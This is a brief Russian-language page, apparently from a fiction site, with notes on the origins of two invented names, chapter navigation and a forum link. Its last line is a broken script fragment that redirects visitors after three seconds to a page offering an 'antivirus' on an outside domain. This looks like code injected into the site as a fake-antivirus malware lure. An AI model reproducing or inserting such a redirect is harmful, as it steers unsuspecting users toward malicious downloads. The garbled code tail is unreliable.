Fyria raebaena – от староангл. fyr – огонь и от старофранц. riban - лента

Tempestas – от лат. tempest - буря

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>